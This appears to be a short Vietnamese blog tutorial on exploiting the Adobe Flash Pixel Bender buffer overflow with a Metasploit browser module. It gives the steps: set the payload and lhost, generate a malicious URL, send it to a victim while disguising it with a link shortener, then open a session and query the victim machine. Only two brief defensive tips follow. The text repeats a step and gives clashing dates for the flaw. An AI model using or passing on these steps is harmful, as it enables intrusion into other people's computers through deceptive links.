Trong bài này tôi sẽ hướng dẫn các bạn khai thác lỗ hổng tràn bộ đệm trong Adobe Flash Player. Lỗ hổng này xảy ra trong lớp flash.Display.Shader, khi thiết lập dữ liệu đặc biệt crafted như bytecode của nó, lỗ hổng được khai thác vào tháng 4 năm 2014, lỗ hổng này đã được thử nghiệm thành công trên IE 6 đến IE 11 với Flash 11, Flash 12 và Flash 13 trên Windows XP SP3, Windows 7 SP1 và Windows 8.
Hình thức tấn công giống với tấn công lỗ hổng Java các bạn xem bài trước của tôi. Sau đây tôi đi vào các bước khai thác chính của lỗ hổng này.
Bước 1: Bật command gõ msfconsole. Sử dụng module exploit/windows/browser/adobe_flash_pixel_bender_bof
Bước 1: Bật command gõ msfconsole. Sử dụng module exploit/windows/browser/adobe_flash_pixel_bender_bof
Bước 2: thiết lập option payload, lhost
Bước 3: gõ exploit. copy url chuyển sang máy victim
Đây chính là đoạn url cần thực thi trên máy victim : http://10.0.0.131:8080/ehBYUpuZJdfdqJC . Các bạn có thể dùng các hình thức rút gọn link sao cho dễ dụ victim click hơn.
Bước 4: duyệt website trên máy nạn nhânKết nối sessions -i 3 lấy thông tin của máy victim thông qua lệnh sysinfo.
Đến đây phần còn lại để dành cho các bạn. Đây là lỗ hổng bảo mật năm 2015 và tôi dự đoán sẽ là lỗ hổng được tấn công phổ biến nhất vào năm nay. Để phòng chống lỗ hổ này bằng cách :
- Sử dụng trình duyệt an toàn hơn IE
- Update flash lên phiên bản 14
Cách hack lỗ hỗng flash player
4/
5
Oleh
Unknown